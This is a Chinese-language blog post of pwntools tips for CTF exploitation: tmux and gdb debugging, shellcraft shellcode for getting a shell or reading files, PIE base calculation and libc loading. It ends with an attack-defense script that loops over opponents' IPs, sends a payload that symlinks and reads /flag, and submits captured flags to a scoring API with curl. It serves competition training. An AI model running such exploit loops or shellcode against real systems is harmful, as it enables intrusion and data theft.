pwntools编写技巧

在最近的几次比赛中查看大佬们的exp学到了很多用pwntools编写exp时的小技巧一、利用TMUX多屏调试TMUX是一款终端复用软件，用来在一个终端里面开启多个窗口，极大的提升了工作效率，在工作中使用带有图形化界面的虚拟机实在太吃资源，而且不同版本libc切换复杂，于是我们可以选择通过配置一台服务器使用纯终端的模式就行调试，这就需要tmux进行多屏调试context.terminal = ['t

ZERO-A-ONE

1356人浏览 · 2020-12-11 10:36:39

ZERO-A-ONE · 2020-12-11 10:36:39 发布

在最近的几次比赛中查看大佬们的exp学到了很多用pwntools编写exp时的小技巧

一、利用TMUX多屏调试

TMUX是一款终端复用软件，用来在一个终端里面开启多个窗口，极大的提升了工作效率，在工作中使用带有图形化界面的虚拟机实在太吃资源，而且不同版本libc切换复杂，于是我们可以选择通过配置一台服务器使用纯终端的模式就行调试，这就需要tmux进行多屏调试

context.terminal = ['tmux', 'splitw', '-h']

这段代码可以在我们调试的时候，自动一分为二增加一个窗口现实GDB的调试内容

二、指定运行环境

制定了运行环境就可以使用pwntools自带的许多工具生成shellcode

context(arch = 'amd64' , os = 'linux', log_level="debug")

在context中指定了os和arch才可以像下面一样调用，要不然你得写成shellcraft.amd64.linux.sh()。

shellcraft.sh()：

生成针对当前os和arch的一段可以getshell的shellcode，这个功能用途不大，所以直接找shellcode还是建议去exploitdb去找

但其实exploitdb上那些shellcode写的也都一般，你自己完全可以写，比如64位时，只需要让rdi指向一个指针，指针里存着"/bin/sh\x00"，然后rsi和rdx置0，然后让rax为0x3b，最后调用syscall就可以了

shellcraft.pushstr()：

生成可以push指定字符串的shellcode，因为你自己写push字符串其实是一个很复杂的操作，比如想要push一段"/home/t1an5t/pwn/flag"这种，就需要对栈空间很熟悉，多次调整才可以，所以有轮子就直接用把

shellcraft.cat()：

生成可以直接读取指定文件的shellcode

这个自己手写shellcode的时候一般都会用open()->read()->write()来进行读取打印

而这个cat()命令帮助你简化了这个操作，不过它调用的其实是open()->sendfileto()这种组合

三、开启了PIE的地址计算

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

我们在IDA静态分析中只能得到相对地址，但在程序运行起来后通过重定位后真正的地址是基地址+相对地址。这段代码是用来程序开启PIE地址随机化后，自动得到基地址，并通过相对地址得到最后真正的物理地址并在此下断点

或者也可以通过这样获得基地址，手动计算

def get_proc_base(p):
    proc_base = p.libs()[p._cwd+p.argv[0].strip('.')]
    return proc_base

四、不同libc加载库的选择

# 正常的调用
p = process('./elf')

# 指定libc的调用，当然，如果你本地的ld.so搞不定libc，这种方法也会报错
p = process('./elf', env={'LD_PRELOAD':'./libc.so.6'})

# starctf2019里见到的
pwn_file="./lib/ld-2.29.so --library-path ./lib/ ./babyheap"
p = process(pwn_file.split())

五、Attach

用gdb来attach的时候，一般会在对应的位置加一句：

gdb.attach(p, cmd)

这里的cmd相当于你attach进程之后在gdb里下的命令，如果想下多条命令，要记得加\n模拟回车，比如：

cmd = "b main\n"
cmd += "set $a = 0x8048000\n"
gdb.attach(p, cmd)

但是要注意，其实gdb attach的时候，你的程序并不会按你想的那样停下来，它会继续往下执行代码。

所以一般我的习惯是在atatch之后加一句pause() ，这样能保证pause()之后**python层面的接下来的代码**的不会被调用。

所以我一般会把调试的函数写成这样：

def debug(cmd=""):
    gdb.attach(p, cmd)
    pause()

然后在交互的一开始就写下debug()，然后在对应需要停下的地方下面写一行pause()

这种加入了pause()的写法，想要向下执行，需要在已经attach的gdb终端里执行c命令，然后再回到程序运行的终端按回车，回车的次数决定了你想要向下执行几个pause()，不想继续了，就在gdb的终端里ctrl+C断下来。然后想继续就重复这个流程就行了

设置某些变量时，一般都会用set $a=...这种，然后在gdb里查看内存可以用x/(numbs)(type) $a这种:

x/32gx $a
x/24wx $a
x/16b $a
x/8c $a
... ...

正常的堆题目，会把堆块指针，也许还有其他信息存放到bss段上的，假设IDA显示为0x202010，那么我们可以设置：

cmd = '''set $a=%d''' %(proc_base+0x202010)

稍复杂一点的堆题目，可能会在初始化的时候开辟一块存储堆块指针的空间，然后把指向这个空间的指针存到bss，这个时候可以采用这种方式来设置：

cmd = '''set $a=*(long*)(%s)''' % hex(proc_base+0x202110)

六、AD模式

一个AD模式EXP的例子，将对手的gamebox的IP填入ip.txt文件，然后填写自动提交flag的接口网址，还有自己的token，将真正的利用exp写在main函数里，于是就可以实现自己打自己交flag了

from pwn import *

context.arch='amd64'
# context.log_level='debug'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def main(host,port=16957):
    global p
    if host:
    	p=remote(host,port)
    else:
    	p=process("./pwn")
    	# gdb.attach(p)
    	debug(0x00000000000739D)
    code = """string readfile(string name);string lnk(string src, string dest);string print(string x);lnk("/flag", "/tmp/y");print(readfile("/tmp/y"));"""

    p.recvuntil("size: ")
    p.sendline(str(len(code)+2))
    p.recvuntil("Give me your script(same size): ")
    p.sendline(code)

    try:
        p.recvuntil("flag",timeout=0.5)
        flag = "flag" + p.recvuntil("\n",timeout=0.5)
        info(flag)
        p.close()
        return flag
    except Exception,err:
        print err
        p.close()
        return "bad_luck"
    p.interactive()

if __name__ == '__main__':
	# libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
	# main("123.57.209.176")

	# main("172.20.0.27")
    ips = [i.strip() for i in open("ip.txt","rb").readlines()]
    while(1):
        for ip in ips:
        	try:
        		sleep(1)
        		flag = main(ip)
        		# flag = main(args["REMOTE"])
        		info(flag)
        		url = 'https://172.20.1.1/Answerapi/sub_answer_api'
        		token = 'token78s8gbv55k4b03'
        		cmds = 'curl -k {} -d "answer={}&playertoken={}"'.format(url,flag.strip(),token)
        		print cmds
        		if 'flag' in cmds:
        			os.system(cmds)
        	except Exception,err:
        		p.close()
        		print err
        		continue
        sleep(30)